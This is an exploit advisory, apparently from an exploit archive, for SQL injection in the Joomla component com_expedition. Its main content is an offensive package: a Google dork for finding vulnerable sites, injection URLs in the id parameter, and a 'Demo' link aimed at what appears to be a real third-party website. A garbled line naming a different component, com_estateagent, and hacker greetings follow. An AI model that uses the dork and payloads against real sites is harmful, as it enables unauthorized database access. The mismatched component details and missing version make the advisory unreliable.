Joomla Component (com_expedition) <= SQL Injection Vulnerability

####
# Exploit Title: Joomla Component (com_expedition) <= SQL Injection Vulnerability
# Author: BHG Security Center
# Date: 2011-10-10
# Vendor: N/A
# E-mail: Net.Edit0r@att.net  |  black.hat.tm@gmail.com
# Website: www.black-hg.org
# Google Dork: inurl:index.php?option=com_expedition
# Category:: Webapps
# Tested on: [Windows Vista Edition Intgral- French]
# http://demo15.joomlaapps.com/
####
 
 
[*] ExpLo!T :
 
http://127.0.0.1/index.php?option=com_expedition&task=detail&id=-3235'
 
http://127.0.0.1/index.php?option=com_expedition&task=detail&id=[SQLi]
 
http://127.0.0.1/path/index.php?option=com_expedition&task=detail&id=[SQLi]

[*] Demo : http://www.astrobio.net/index.php?option=com_expedition&task=detail&id=-3235
 
####
 
[+] Peace From Algeria

Vunl Component : com_estateagent

Error in file joomla Component (com_estateagent) Sql Injection

A vulnerable parameter $ detail&id=
 
####
 
=================================**BHG Security Center**=====================================|
# Greets To :                                                                                |
                                                                                             |
Net.Edit0r ~ A.Cr0x ~ 3H34N ~ 4m!n ~ Cyrus ~ tHe.k!ll3r ~ Mr.XHat ~ ArYaIeIrAn ~ Mikili      |
cmaxx M4hd1 ~ Cru3l.b0y ~ HUrr!c4nE ~ r3v0lter , NoL1m1t , farbodmahini ~ xb0y               |
THANKS TO ALL Iranian HackerZ                                                                |                 |
============================================================================================ |